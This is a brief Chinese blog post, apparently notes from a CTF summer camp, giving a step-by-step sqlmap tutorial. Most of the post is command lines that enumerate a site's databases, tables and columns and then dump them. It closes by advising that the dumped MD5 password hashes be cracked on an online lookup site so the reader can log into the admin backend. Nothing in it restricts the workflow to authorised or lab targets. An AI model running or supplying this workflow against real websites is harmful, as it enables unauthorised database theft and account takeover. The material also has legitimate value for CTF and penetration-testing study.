总结下ctf夏令营的学到的东西,SQLmap的使用:
SQLmap是基于python2.7点全能的跑库软件,主要使用方法是:
1,寻找可以注入的注入点例如

xxx/xxx.php?id=1

2,将找到的URL带入

sqlmap -u "url" --random-agent --batch --level 3(最高5但那是要死的节奏) --dbs

3,如果网站防护较差可以跑出数据库来的。跑出来后可以看information-shache的库因为这是一个总的列表库,当然可以跑一般库命令

sqlmap -u "url" --random-agent --batch --level 3 -D xxx(库名) --table 跑表

4,继续跑字段

sqlmap -u "url" --random-agent --batch --level 3 -D xxx(库名) -T xxx(表名) --columns

5,继续跑具体数据

sqlmap -u "url" --random-agent --batch --level 3 -D xxx(库名) -T xxx(表名) -C "xxx,xxx,xxx" --dump

6,据此可以跑出所有的想要的账号密码但是是md5加密的。不过这不要紧,有somd5.com可以免费查询。据此便可登录后台了。

最后修改:2019 年 04 月 08 日 08 : 46 PM
如果你觉得有用,欢迎赞赏